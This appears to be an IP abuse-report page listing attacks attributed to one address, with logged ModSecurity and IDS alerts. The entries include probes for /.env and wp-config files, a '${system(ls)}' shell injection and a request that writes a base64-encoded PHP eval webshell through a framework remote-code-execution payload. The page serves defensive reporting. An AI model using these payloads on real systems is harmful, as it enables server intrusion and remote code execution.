πΊπΈ
mawan
2026-07-24 12:25:31
(14 hours ago)
Suspected of having performed illicit activity on LAX server.
Web App Attack
πΊπΈ
mawan
2026-07-23 10:38:41
(1 day ago)
Suspected of having performed illicit activity on LAX server.
Web App Attack
π΅π±
srebrakowski.com
2026-07-10 08:15:21
(2 weeks ago)
IDS/IPS Alert: ET EXPLOIT GraphQL Introspection Query Attempt. Protocol: TCP, Port: 80. Request: {"q ...
show more
IDS/IPS Alert: ET EXPLOIT GraphQL Introspection Query Attempt. Protocol: TCP, Port: 80. Request: {"query":"query IntrospectionQuery{__schema{queryType{name} types{name} directives{name}}}"}
show less
Hacking
Web App Attack
πΊπΈ
chrisj
2026-07-05 20:01:26
(2 weeks ago)
[Sun Jul 05 20:01:24.856599 2026] [proxy_fcgi:error] [pid 515552:tid 515599] [remote 172.68.164.37:1 ...
show more
[Sun Jul 05 20:01:24.856599 2026] [proxy_fcgi:error] [pid 515552:tid 515599] [remote 172.68.164.37:13231] AH01071: Got error 'Primary script unknown'
[Sun Jul 05 20:01:25.433705 2026] [proxy_fcgi:error] [pid 515552:tid 515600] [remote 172.68.164.37:13231] AH01071: Got error 'Primary script unknown'
[Sun Jul 05 20:01:26.414133 2026] [proxy_fcgi:error] [pid 515552:tid 515601] [remote 172.68.164.37:13231] AH01071: Got error 'Primary script unknown'
...
show less
Brute-Force
π¦πΊ
dyln
2026-06-28 12:22:37
(3 weeks ago)
Dyls honeypot brute-force: proto8 (2 total hits)
Brute-Force
πΊπΈ
TPI-Abuse
2026-05-21 02:17:59
(2 months ago)
(mod_security) mod_security (id:210492) triggered by 172.68.164.37 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:210492) triggered by 172.68.164.37 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed May 20 22:17:51.605711 2026] [security2:error] [pid 24476:tid 24476] [client 172.68.164.37:10791] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "reallifelearninghub.com"] [uri "/.env.development.local"] [unique_id "ag5rT17fC804RDnMa4bcowAAAB0"]
show less
Brute-Force
Bad Web Bot
Web App Attack
π³π±
homeshowdomain.nl
2026-05-11 22:01:18
(2 months ago)
Auto-ban: >3000 req/min op 2026-05-11
Web App Attack
SSH
Hacking
πΊπΈ
TPI-Abuse
2026-05-08 08:30:54
(2 months ago)
(mod_security) mod_security (id:210492) triggered by 172.68.164.37 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:210492) triggered by 172.68.164.37 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri May 08 04:30:47.739096 2026] [security2:error] [pid 18783:tid 18783] [client 172.68.164.37:9319] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "kithouse.org"] [uri "/.env"] [unique_id "af2fNxnsHJWaJPyePpOSmQAAAAg"], referer: https://www.google.com/search?q=kithouse.org
show less
Brute-Force
Bad Web Bot
Web App Attack
πΊπΈ
TPI-Abuse
2026-05-08 02:56:11
(2 months ago)
(mod_security) mod_security (id:210492) triggered by 172.68.164.37 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:210492) triggered by 172.68.164.37 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu May 07 22:55:58.540165 2026] [security2:error] [pid 28549:tid 28549] [client 172.68.164.37:10956] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "mail.rhythmandbluescompany.com"] [uri "/wp-config.old"] [unique_id "af1QvrbQvr1e-IJeIl2_MQAAAAo"]
show less
Brute-Force
Bad Web Bot
Web App Attack
πΊπΈ
mawan
2026-04-21 22:08:34
(3 months ago)
Suspected of having performed illicit activity on LAX server.
Web App Attack
π§πΎ
lns.bz
2026-02-22 15:40:57
(5 months ago)
Too many 404 requests [BY]
Web App Attack
πΊπΈ
AbuseIPDB
AbuseIPDB Official
2026-02-02 04:49:27
(5 months ago)
Suspicious Operation. Request content:
s=file_put_contents('bxs.php',base64_decode('R2lmODlhPD9waHAg ...
show more
Suspicious Operation. Request content:
s=file_put_contents('bxs.php',base64_decode('R2lmODlhPD9waHAgY2xhc3MgR1lVSjlnN2wgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg3elgzKXsgQGV2YWwoIi8qWjdDYzR1cldWOSovIi4kSDd6WDMuIi8qWjdDYzR1cldWOSovIik7IH19bmV3IEdZVUo5ZzdsKCRfUkVRVUVTVFsnNGs0ZDY2NiddKTs%2FPg%3D%3D'))&_method=__construct&method=POST&filter[]=assert
show less
Web App Attack
πΈπ¬
pusathosting.com
2026-01-19 16:00:06
(6 months ago)
24ds22 bruteforce
Brute-Force
Web App Attack
π¦πΊ
oncord
2025-12-28 08:46:11
(6 months ago)
Form spam
Web Spam
πͺπΈ
el-brujo
2025-10-21 16:58:12
(9 months ago)
21/Oct/2025:18:58:12.215048 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
21/Oct/2025:18:58:12.215048 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 172.68.164.37] ModSecurity: Warning. Pattern match "(?:\\\\\\\\$(?:\\\\\\\\((?:\\\\\\\\(.*\\\\\\\\)|.*)\\\\\\\\)|\\\\\\\\{.*\\\\\\\\})|[<>]\\\\\\\\(.*\\\\\\\\))" at ARGS:Language. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "367"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${system(ls)}} found within ARGS:Language: de{${system(ls)}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/248/88"] [tag "PCI/6.5.2"] [hostname "warzone.elhacker.net"] [uri "/mailingupgrade.php"] [unique_id "aPe7pG262Ib638n229LAHgAEvzU"]
...
show less
Hacking
Web App Attack